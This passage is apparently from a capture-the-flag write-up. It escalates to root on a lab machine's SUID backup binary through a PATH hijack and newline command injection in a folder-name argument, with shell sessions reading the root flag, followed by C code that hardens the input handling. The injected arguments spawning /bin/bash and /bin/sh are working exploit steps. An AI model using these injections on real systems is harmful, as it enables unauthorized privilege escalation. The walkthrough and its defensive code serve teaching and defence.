tom@node:/tmp$ echo "/bin/bash" >/tmp/token
echo "/bin/bash" >/tmp/token
tom@node:/tmp$ chmod +x /tmp/token
chmod +x /tmp/token
tom@node:/tmp$ export PATH=`pwd`:$PATH
export PATH=`pwd`:$PATH

And we execute the exploit.

tom@node:/tmp$ /usr/local/bin/backup abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `cat payload`




[+] Validated access token
[+] Starting archiving▒u▒
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@node:/tmp# id
id
uid=0(root) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
root@node:/tmp# cat /root/root.txt
cat /root/root.txt
<ROOT_FLAG>

Alternative: abusing the folder name

The newline character \n is not in the list of prohibited characters.

/usr/bin/zip -r -P magicword tempfile folder > /dev/null

If we can turn the command into:

/usr/bin/zip -r -P magicword tempfile payload
/bin/bash
echo this command is invisible > /dev/null

we should gain root access. The third line is needed because otherwise the trailing > /dev/null would apply to our shell and its output would be invisible. The $( ) is expanded by our own shell before the argument reaches the program, so the prohibited character $ is never sent to it.
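From the defender's side, the two defects this writeup relies on, the unbounded copy of the folder name into a 508-byte buffer (the thousand D's) and a character blacklist that still lets a newline reach /bin/sh, are closed by the same kind of input handling. This is an added example in C, not the backup binary's source: the 508-byte size follows the writeup's offset, and the blacklist string, the allowlist and the sample inputs are constructed for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the backup binary's code. FOLDER_MAX follows the
 * writeup (offset 512 = 508-byte local buffer + 4-byte saved EBP). */
#define FOLDER_MAX 508

/* Blacklist-style check (constructed): it forbids '$' and a few shell
 * metacharacters but, like the real check, says nothing about '\n' and
 * nothing about length. */
bool blacklist_ok(const char *name)
{
    static const char forbidden[] = "$;&|`";
    return strpbrk(name, forbidden) == NULL;
}

/* Hardened check: explicit length bound plus an allowlist of characters.
 * A newline, quote, '$' or anything else the shell cares about is rejected
 * simply by not being on the list; ".." is refused to block traversal. */
bool folder_name_ok(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len >= FOLDER_MAX)      /* keep room for the NUL */
        return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        bool ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                  (c >= '0' && c <= '9') || c == '_' || c == '-' ||
                  c == '.' || c == '/';
        if (!ok)
            return false;
    }
    return strstr(name, "..") == NULL;
}

/* Bounded copy into the fixed-size buffer, only after validation: the
 * strcpy() that the thousand D's overflowed, made safe. */
bool store_folder(char dst[FOLDER_MAX], const char *name)
{
    if (!folder_name_ok(name))
        return false;
    snprintf(dst, FOLDER_MAX, "%s", name);
    return true;
}

/* Replay the writeup's first test: a folder name made of n 'D' characters. */
bool d_name_rejected(size_t n)
{
    char name[2048];
    if (n >= sizeof name)
        return false;
    memset(name, 'D', n);
    name[n] = '\0';
    return !folder_name_ok(name);
}

/* Build the zip command as an argv vector for execv() instead of a string
 * for system(): the folder name stays a single argument and is never
 * re-parsed by /bin/sh, so an embedded newline cannot start a command. */
int build_zip_argv(const char *argv_out[8], const char *folder)
{
    int n = 0;
    argv_out[n++] = "/usr/bin/zip";
    argv_out[n++] = "-r";
    argv_out[n++] = "-P";
    argv_out[n++] = "magicword";
    argv_out[n++] = "tempfile";
    argv_out[n++] = folder;
    argv_out[n] = NULL;
    return n;
}

int main(void)
{
    /* Constructed inputs: a normal name, the newline trick, and a '$' abuse. */
    const char *inputs[] = { "payload", "payload\n/bin/bash\necho junk", "$(id)" };
    char buf[FOLDER_MAX];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("blacklist=%d allowlist=%d stored=%d\n", blacklist_ok(inputs[i]),
               folder_name_ok(inputs[i]), store_folder(buf, inputs[i]));
    return 0;
}
```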

tom@node:/tmp$ /usr/local/bin/backup abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'payload \n /bin/bash \n echo this command is invisble')"




[+] Validated access token
[+] Starting archiving payload
 /bin/bash
 echo this command is invisble
  adding: payload (deflated 96%)
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@node:/tmp# cat /root/root.txt
cat /root/root.txt
<ROOT_FLAG>
root@node:/tmp# exit
exit
exit
[+] Finished! Encoded backup is below:
UEsDBBQACQAIACwgsFDNhrgUHwAAAAwCAAAHABwAcGF5bG9hZFVUCQADg1e/XpNXv151eAsAAQTpAwAABOkDAAAP1w5OY0DzOHuxQyVtcnwZCpJgAIypSvOoc5EhfFSNUEsHCM2GuBQfAAAADAIAAFBLAQIeAxQACQAIACwgsFDNhrgUHwAAAAwCAAAHABgAAAAAAAAAAACkgQAAAABwYXlsb2FkVVQFAAODV79edXgLAAEE6QMAAATpAwAAUEsFBgAAAAABAAEATQAAAHAAAAAAAA==

Actually, we don't need printf at all: we can type the newlines directly on the command line, inside the double quotes.

tom@node:/tmp$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "payload
> /bin/sh
> echo junk"
  adding: payload (deflated 96%)
# id
uid=0(root) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
# exit
UEsDBBQACQAIACwgsFDNhrgUHwAAAAwCAAAHABwAcGF5bG9hZFVUCQADg1e/XpNXv151eAsAAQTpAwAABOkDAADtx+YFsJWsrYh3pL6S28VuplrALHCzh4x3SkL8gzccUEsHCM2GuBQfAAAADAIAAFBLAQIeAxQACQAIACwgsFDNhrgUHwAAAAwCAAAHABgAAAAAAAAAAACkgQAAAABwYXlsb2FkVVQFAAODV79edXgLAAEE6QMAAATpAwAAUEsFBgAAAAABAAEATQAAAHAAAAAAAA==

References

Daniel Simao 19:21, 16 May 2020 (EDT)